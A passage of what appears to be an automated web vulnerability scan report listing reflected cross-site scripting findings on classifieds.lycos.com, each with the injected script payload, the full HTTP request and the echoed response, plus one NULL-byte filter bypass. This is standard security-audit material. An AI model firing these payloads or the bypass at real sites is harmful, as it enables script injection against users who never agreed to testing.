GET /saleca0c4"><script>alert(1)</script>f5884d558bf/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 14:59:03 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:59:03 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17667

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/saleca0c4"><script>alert(1)</script>f5884d558bf/?mobile=1" rel="nofollow">
...[SNIP]...

1.174. http://classifieds.lycos.com/sale/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /sale/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a221b"><script>alert(1)</script>92058a17db1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale/?a221b"><script>alert(1)</script>92058a17db1=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 14:58:16 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:58:16 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 47476

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/sale/?a221b"><script>alert(1)</script>92058a17db1=1&mobile=1" rel="nofollow">
...[SNIP]...

1.175. http://classifieds.lycos.com/service-car/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /service-car/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c521f"><script>alert(1)</script>dc92c066fef was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /service-carc521f"><script>alert(1)</script>dc92c066fef/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:52:52 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:52:52 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17688

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/service-carc521f"><script>alert(1)</script>dc92c066fef/?mobile=1" rel="nofollow">
...[SNIP]...

1.176. http://classifieds.lycos.com/service-car/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /service-car/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8ada"><script>alert(1)</script>12bcdb56ad8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /service-carc8ada"><script>alert(1)</script>12bcdb56ad8/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:20:27 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:20:27 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17688

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/service-carc8ada"><script>alert(1)</script>12bcdb56ad8/?mobile=1" rel="nofollow">
...[SNIP]...

1.177. http://classifieds.lycos.com/service-car/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /service-car/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a67a"><script>alert(1)</script>494540086bc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /service-car/?2a67a"><script>alert(1)</script>494540086bc=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:20:05 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:20:05 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 38478

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/service-car/?2a67a"><script>alert(1)</script>494540086bc=1&mobile=1" rel="nofollow">
...[SNIP]...

1.178. http://classifieds.lycos.com/service-care/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /service-care/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24db4"><script>alert(1)</script>f6cca02a61f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /service-care24db4"><script>alert(1)</script>f6cca02a61f/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:19:02 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:19:02 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17691

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/service-care24db4"><script>alert(1)</script>f6cca02a61f/?mobile=1" rel="nofollow">
...[SNIP]...

1.179. http://classifieds.lycos.com/service-care/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /service-care/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c519"><script>alert(1)</script>d96e3b9593b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /service-care/?4c519"><script>alert(1)</script>d96e3b9593b=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:18:14 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:18:14 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 36347

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/service-care/?4c519"><script>alert(1)</script>d96e3b9593b=1&mobile=1" rel="nofollow">
...[SNIP]...

1.180. http://classifieds.lycos.com/service-cleaning/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /service-cleaning/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78b35"><script>alert(1)</script>632d4fa0958 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /service-cleaning78b35"><script>alert(1)</script>632d4fa0958/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:16:31 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:16:31 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17703

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/service-cleaning78b35"><script>alert(1)</script>632d4fa0958/?mobile=1" rel="nofollow">
...[SNIP]...

1.181. http://classifieds.lycos.com/service-cleaning/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /service-cleaning/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dedc9"><script>alert(1)</script>4c918edfa3e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /service-cleaning/?dedc9"><script>alert(1)</script>4c918edfa3e=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:16:02 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:16:02 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 39327

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/service-cleaning/?dedc9"><script>alert(1)</script>4c918edfa3e=1&mobile=1" rel="nofollow">
...[SNIP]...

1.182. http://classifieds.lycos.com/service-coupon/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /service-coupon/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9b855"><script>alert(1)</script>9221725e733 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /service-coupon9b855"><script>alert(1)</script>9221725e733/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:20:27 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:20:27 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17697

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/service-coupon9b855"><script>alert(1)</script>9221725e733/?mobile=1" rel="nofollow">
...[SNIP]...

1.183. http://classifieds.lycos.com/service-coupon/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /service-coupon/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d8a6"><script>alert(1)</script>6207b143050 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /service-coupon/?9d8a6"><script>alert(1)</script>6207b143050=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:20:09 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:20:09 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 34809

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/service-coupon/?9d8a6"><script>alert(1)</script>6207b143050=1&mobile=1" rel="nofollow">
...[SNIP]...

1.184. http://classifieds.lycos.com/service-creative-design/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /service-creative-design/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dabc4"><script>alert(1)</script>0ff54031af4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /service-creative-designdabc4"><script>alert(1)</script>0ff54031af4/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:53:39 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:53:39 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17724

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/service-creative-designdabc4"><script>alert(1)</script>0ff54031af4/?mobile=1" rel="nofollow">
...[SNIP]...

1.185. http://classifieds.lycos.com/service-creative-design/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /service-creative-design/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff106"><script>alert(1)</script>ac1990bc01f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /service-creative-design/?ff106"><script>alert(1)</script>ac1990bc01f=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:53:32 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:53:32 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 31355

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/service-creative-design/?ff106"><script>alert(1)</script>ac1990bc01f=1&mobile=1" rel="nofollow">
...[SNIP]...

1.186. http://classifieds.lycos.com/service-education-tutor/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /service-education-tutor/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b57d4"><script>alert(1)</script>a02ae31ac68 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /service-education-tutorb57d4"><script>alert(1)</script>a02ae31ac68/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:53:51 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:53:51 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17724

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/service-education-tutorb57d4"><script>alert(1)</script>a02ae31ac68/?mobile=1" rel="nofollow">
...[SNIP]...

1.187. http://classifieds.lycos.com/service-education-tutor/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /service-education-tutor/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 31fb3"><script>alert(1)</script>50ca0473215 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /service-education-tutor/?31fb3"><script>alert(1)</script>50ca0473215=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:53:45 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:53:45 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 45535

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/service-education-tutor/?31fb3"><script>alert(1)</script>50ca0473215=1&mobile=1" rel="nofollow">
...[SNIP]...

1.188. http://classifieds.lycos.com/service-entertainment-catering/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /service-entertainment-catering/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e23a3"><script>alert(1)</script>da19991cd03 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /service-entertainment-cateringe23a3"><script>alert(1)</script>da19991cd03/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:19:04 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
